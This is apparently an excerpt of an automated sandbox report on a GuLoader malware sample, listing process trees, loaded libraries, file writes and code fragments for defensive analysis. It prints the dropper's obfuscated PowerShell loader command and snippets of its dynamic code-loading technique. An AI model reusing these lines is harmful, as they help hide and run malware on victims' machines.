            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll 3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 212AEA12 appears 67 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 2122B970 appears 175 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 212BF290 appears 94 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 21275130 appears 44 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 21287E54 appears 77 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 0315F290 appears 105 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 030CB970 appears 272 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 0314EA12 appears 86 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 03115130 appears 36 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 03127E54 appears 98 times
            Source: textless.exe, 00000000.00000000.876822237.0000000000433000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameimmensest autoecic.exe6 vs textless.exe
            Source: textless.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/25@2/3
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404486
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\textless.exeFile created: C:\Users\user\AppData\Roaming\fyldepenneblkketsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
            Source: C:\Users\user\Desktop\textless.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsr1F1B.tmpJump to behavior
            Source: textless.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\textless.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\textless.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: textless.exeVirustotal: Detection: 30%
            Source: textless.exeReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\textless.exeFile read: C:\Users\user\Desktop\textless.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\textless.exe "C:\Users\user\Desktop\textless.exe"
            Source: C:\Users\user\Desktop\textless.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Versificator.exe "C:\Users\user~1\AppData\Local\Temp\Versificator.exe"
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeProcess created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
            Source: C:\Users\user\Desktop\textless.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Versificator.exe "C:\Users\user~1\AppData\Local\Temp\Versificator.exe"Jump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeProcess created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\textless.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile written: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Dareful.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: textless.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: logman.pdb source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Versificator.exe, Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: logman.pdbGCTL source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0ogHncCUa.exe, 0000000E.00000002.2117421157.000000000030F000.00000002.00000001.01000000.0000000F.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.1507106973.0000000009D53000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Efforts $Tufstenenslluviate $Daahjortenes), (Turricular @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rerunning = [AppDomain]::CurrentDomain.GetAssemblie
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dobbeltfejls)), $Komponenternes).DefineDynamicModule($Inquaintance, $false).DefineType($Nondecadent, $Velsesskibenes, [System.Multicas
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0743F90E push 1C081915h; ret 1_2_0743F915
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212309AD push ecx; mov dword ptr [esp], ecx11_2_212309B6
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CA5A7 push eax; ret 14_2_048CA5A8
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CF5E2 push ebx; ret 14_2_048CF5EA
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CA536 push ebx; ret 14_2_048CA53A
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CEEDD push edx; retf 14_2_048CEEDF
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048D1F39 push ecx; iretd 14_2_048D1F3A
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048D4740 push edx; retf 14_2_048D4741
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048C58FF push CC412C59h; retf 14_2_048C5908
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048C20F2 push ss; ret 14_2_048C2102
